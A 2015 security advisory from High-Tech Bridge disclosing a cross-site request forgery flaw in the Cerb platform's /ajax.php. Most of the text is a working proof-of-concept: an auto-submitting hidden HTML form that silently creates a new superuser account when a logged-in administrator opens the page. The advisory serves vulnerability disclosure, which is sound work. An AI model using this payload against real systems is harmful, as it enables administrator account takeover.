Cross-Site Request Forgery in Cerb

2015-08-12T00:00:00
ID HTB23269
Type htbridge
Reporter High-Tech Bridge
Modified 2015-08-18T00:00:00

Description

High-Tech Bridge Security Research Lab discovered CSRF vulnerability in Cerb platform, which can be exploited to perform Cross-Site Request Forgery attacks against administrators of vulnerable web application to add administrate accounts into the system.

The vulnerability exists due to failure of the "/ajax.php" script to properly verify the source of incoming HTTP request. Taking into consideration that Cerb is a business-critical application, this security flaw may be quite dangerous if exploited by malicious attackers.

A simple exploit below will add admin user into the system when a logged-in victim opens a malicious page with the exploit:

<form action="http://[host]/ajax.php" method = "POST">
<input type="hidden" name="c" value="config">
<input type="hidden" name="a" value="handleSectionAction">
<input type="hidden" name="section" value="workers">
<input type="hidden" name="action" value="saveWorkerPeek">
<input type="hidden" name="id" value="0">
<input type="hidden" name="view_id" value="workers_cfg">
<input type="hidden" name="do_delete" value="0">
<input type="hidden" name="first_name" value="first name">
<input type="hidden" name="last_name" value="last name">
<input type="hidden" name="title" value="title">
<input type="hidden" name="email" value="username@mail.com">
<input type="hidden" name="at_mention_name" value="name">
<input type="hidden" name="is_disabled" value="0">
<input type="hidden" name="is_superuser" value="1">
<input type="hidden" name="lang_code" value="en_US">
<input type="hidden" name="timezone" value="Antarctica%2FTroll">
<input type="hidden" name="time_format" value="D%2C+d+M+Y+h%3Ai+a">
<input type="hidden" name="auth_extension_id" value="login.password">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_verify" value="password">
<input type="hidden" name="calendar_id" value="new">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>